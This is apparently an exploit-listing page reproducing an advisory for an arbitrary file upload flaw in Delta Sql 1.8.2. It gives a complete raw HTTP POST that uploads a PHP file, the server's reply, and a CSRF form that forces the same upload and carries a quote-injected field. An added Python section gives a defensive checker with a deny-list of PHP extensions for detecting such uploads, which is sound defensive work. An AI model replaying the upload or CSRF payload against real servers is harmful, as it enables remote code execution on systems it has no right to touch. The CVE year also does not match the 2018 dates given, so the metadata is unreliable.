Delta Sql 1.8.2 - Arbitrary File Upload
CVE: CVE-2021-36306
Category: CWE-434
Price: $300
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-12-24
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120213 Below is a copy:
Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload
Exploit Author: DunnyWhizzBang
Vendor Homepage: http://deltasql.sourceforge.net/
Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
Software Link: http://deltasql.sourceforge.net/deltasql/
Tested on: Windows 7 x64 / Kali Linux x64
POC:
1)
http://localhost/[PATH]/docs_manage.php?id=1
http://localhost/[PATH]/upload/[FILE]
POST /[PATH]/docs_upload.php HTTP/1.1
Host: TARGET
User-Agent: Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/docs_manage.php?id=1
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------158943328914318561992147220435
Content-Length: 721

-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
Content-Type: application/force-download

<?php
phpinfo();
?>
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="id"

1
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="version"


-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="hasdocs"


-----------------------------158943328914318561992147220435--

HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:24:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
########## CSRF EXPLOITATION ##################
<html>
<body>
<form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
Select document to upload:
<input name="fileToUpload" id="fileToUpload" type="file">
<input value="Ver Ayari" name="submit" type="submit">
<input value="1" name="id" type="hidden">
<input value="1'" name="version" type="hidden">
<input value="1" name="hasdocs" type="hidden">
</form>
</body>
</html>
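
A defensive check for the upload request shown above, added here as an example and not part of the original advisory or the deltasql code base: it parses a multipart/form-data body and flags file parts whose name carries a server-executable extension or whose content contains PHP open tags. The function names, the extension deny-list and the sample body are assumptions constructed for illustration.

```python
import os
from email import message_from_bytes

# Assumed deny-list of extensions an Apache/PHP host may execute.
EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".pht"}
PHP_MARKERS = (b"<?php", b"<?=")

def inspect_upload(content_type, body):
    """Return a finding for every file part that looks like server-side code."""
    # Prepend the request's Content-Type so the stdlib MIME parser sees the boundary.
    msg = message_from_bytes(
        b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body)
    findings = []
    if not msg.is_multipart():
        return findings
    for part in msg.get_payload():
        filename = part.get_filename()
        if filename is None:
            continue  # plain form field such as "id" or "version"
        # Normalise: drop any client path, lowercase, strip trailing dots/spaces
        # (Windows ignores them, so "x.php." lands on disk as "x.php").
        name = os.path.basename(filename.replace("\\", "/")).lower().rstrip(". ")
        # Check every dot-separated segment so "x.php.jpg" is caught too.
        exts = {"." + seg for seg in name.split(".")[1:]}
        data = part.get_payload(decode=True) or b""
        reasons = []
        if exts & EXEC_EXT:
            reasons.append("executable extension")
        if any(marker in data for marker in PHP_MARKERS):
            reasons.append("PHP code in content")
        if reasons:
            field = part.get_param("name", header="content-disposition")
            findings.append({"field": field, "filename": filename, "reasons": reasons})
    return findings

def build_body(boundary, filename, content):
    """Constructed sample: a multipart body shaped like the request on this page."""
    b = boundary.encode()
    return (b"--" + b + b"\r\nContent-Disposition: form-data; name=\"fileToUpload\"; "
            b"filename=\"" + filename.encode() + b"\"\r\n"
            b"Content-Type: application/force-download\r\n\r\n" + content + b"\r\n"
            b"--" + b + b"\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n"
            b"--" + b + b"--\r\n")

if __name__ == "__main__":
    boundary = "-" * 27 + "158943328914318561992147220435"
    ctype = "multipart/form-data; boundary=" + boundary
    print(inspect_upload(ctype, build_body(boundary, "Efe.php", b"<?php\nphpinfo();\n?>")))
    print(inspect_upload(ctype, build_body(boundary, "notes.txt", b"release notes")))
```

A deny-list like this suits detection in a proxy or log pipeline; the upload handler itself should accept only an allowlist of extensions and store files where the web server will not execute them.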